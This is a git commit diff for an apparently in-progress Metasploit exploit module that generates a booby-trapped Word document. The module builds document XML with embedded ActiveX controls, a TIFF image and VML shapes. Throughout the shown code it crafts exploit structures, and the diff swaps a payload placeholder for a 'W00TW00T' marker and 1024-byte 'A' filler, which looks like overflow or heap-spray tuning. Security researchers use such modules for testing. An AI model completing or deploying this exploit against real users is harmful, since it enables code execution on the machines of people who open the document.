More progress
parent
56d1c545e7
commit
8382d31f46
|
@ -201,7 +201,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
mscd << [0x00000003].pack('V')
|
mscd << [0x00000003].pack('V')
|
||||||
mscd << [0xfffffffe].pack('V')
|
mscd << [0xfffffffe].pack('V')
|
||||||
mscd << [0xffffffff].pack('V') * 52
|
mscd << [0xffffffff].pack('V') * 52
|
||||||
# mscd << "PAYLOAD"
|
|
||||||
|
mscd << "W00TW00T"
|
||||||
|
mscd << "A" * 1024
|
||||||
|
|
||||||
mscd
|
mscd
|
||||||
end
|
end
|
||||||
|
@ -344,8 +346,37 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'w:shapeid' =>"_x0000_i10#{rid.to_s}"
|
'w:shapeid' =>"_x0000_i10#{rid.to_s}"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
shapetype_attrs = {
|
||||||
|
'id' => "rId#{rid.to_s}",
|
||||||
|
'coordsize' => "21600,21600",
|
||||||
|
'o:spt' => "75",
|
||||||
|
'o:preferrelative' => "t",
|
||||||
|
'path' => "m@4@5l@4@11@9@11@9@5xe",
|
||||||
|
'filled' => "f",
|
||||||
|
'stroked' => "f"
|
||||||
|
}
|
||||||
|
|
||||||
xml.r do
|
xml.r do
|
||||||
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
|
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
|
||||||
|
xml['v'].shapetype(shapetype_attrs) do
|
||||||
|
xml['v'].stroke({'joinstyle'=>'miter'})
|
||||||
|
xml['v'].formulas do
|
||||||
|
xml['v'].f({'eqn' => "if lineDrawn pixelLineWidth 0"})
|
||||||
|
xml['v'].f({'eqn' => "sum @0 1 0"})
|
||||||
|
xml['v'].f({'eqn' => "sum 0 0 @1"})
|
||||||
|
xml['v'].f({'eqn' => "prod @2 1 2"})
|
||||||
|
xml['v'].f({'eqn' => "prod @3 21600 pixelWidth"})
|
||||||
|
xml['v'].f({'eqn' => "prod @3 21600 pixelHeight"})
|
||||||
|
xml['v'].f({'eqn' => "sum @0 0 1"})
|
||||||
|
xml['v'].f({'eqn' => "prod @6 1 2"})
|
||||||
|
xml['v'].f({'eqn' => "prod @7 21600 pixelWidth"})
|
||||||
|
xml['v'].f({'eqn' => "sum @8 21600 0"})
|
||||||
|
xml['v'].f({'eqn' => "prod @7 21600 pixelHeight"})
|
||||||
|
xml['v'].f({'eqn' => "sum @10 21600 0"})
|
||||||
|
end
|
||||||
|
xml['v'].path({'o:extrusionok' => "f", 'gradientshapeok' => "t", 'o:connecttype' => "rect"})
|
||||||
|
xml['o'].lock({'v:ext' => "edit", 'aspectratio' => "t"})
|
||||||
|
end
|
||||||
xml['v'].shape(shape_attrs)
|
xml['v'].shape(shape_attrs)
|
||||||
xml['w'].control(control_attrs)
|
xml['w'].control(control_attrs)
|
||||||
end
|
end
|
||||||
|
@ -410,6 +441,36 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# Creates a <w:sectPr> tag
|
||||||
|
# @param xml [Element]
|
||||||
|
#
|
||||||
|
def create_secpr(xml)
|
||||||
|
sectpr_attrs = {
|
||||||
|
'w:rsidR' => "00D15BD0",
|
||||||
|
'w:rsidRPr' => "00D15BD0",
|
||||||
|
'w:rsidSect' => "00F8254F"
|
||||||
|
}
|
||||||
|
|
||||||
|
pgmar_attrs = {
|
||||||
|
'w:top' => "1",
|
||||||
|
'w:right' => "1",
|
||||||
|
'w:bottom' => "1",
|
||||||
|
'w:left' => "1",
|
||||||
|
'w:header' => "1",
|
||||||
|
'w:footer' => "1",
|
||||||
|
'w:gutter' => "0"
|
||||||
|
}
|
||||||
|
|
||||||
|
xml['w'].sectPr(sectpr_attrs) do
|
||||||
|
xml['w'].pgSz({'w:w'=>"1", 'w:h'=>"1"})
|
||||||
|
xml['w'].pgMar(pgmar_attrs)
|
||||||
|
xml['w'].cols({'w:space'=>"1"})
|
||||||
|
xml['w'].docGrid({'w:linePitch'=>"1"})
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Creates a document.xml file
|
# Creates a document.xml file
|
||||||
# @param pre_defs [Array]
|
# @param pre_defs [Array]
|
||||||
|
@ -420,7 +481,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
|
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
|
||||||
# Get all the required pre-defs
|
# Get all the required pre-defs
|
||||||
chart_rids = []
|
chart_rids = []
|
||||||
pre_defs.select { |e| chart_rids << e[:id] }
|
pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
|
||||||
|
|
||||||
# Get all the ActiveX RIDs
|
# Get all the ActiveX RIDs
|
||||||
ax_rids = []
|
ax_rids = []
|
||||||
|
@ -461,10 +522,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
xml.rPr do
|
xml.rPr do
|
||||||
xml.lang({'w:val' => "en-US"})
|
xml.lang({'w:val' => "en-US"})
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
ax_rids.each do |rid|
|
ax_rids.each do |rid|
|
||||||
create_ax_run_element(xml, rid)
|
create_ax_run_element(xml, rid)
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -480,6 +541,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
create_pic_run_element(xml, tiff_rid)
|
create_pic_run_element(xml, tiff_rid)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
create_secpr(xml)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -502,16 +564,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def make_contenttype_xml(overrides)
|
def make_contenttype_xml(overrides)
|
||||||
contenttypes = [
|
contenttypes = [
|
||||||
{
|
{
|
||||||
:Extension =>"rels",
|
:Extension => "rels",
|
||||||
:ContentType =>"application/vnd.openxmlformats-package.relationships+xml"
|
:ContentType => "application/vnd.openxmlformats-package.relationships+xml"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
:Extension =>"xml",
|
:Extension => "xml",
|
||||||
:ContentType =>"application/xml"
|
:ContentType => "application/xml"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
:Extension =>"jpeg",
|
:Extension => "jpeg",
|
||||||
:Contenttype =>"image/jpeg"
|
:Contenttype => "image/jpeg"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
:Extension => "bin",
|
:Extension => "bin",
|
||||||
|
|
Loading…
Reference in New Issue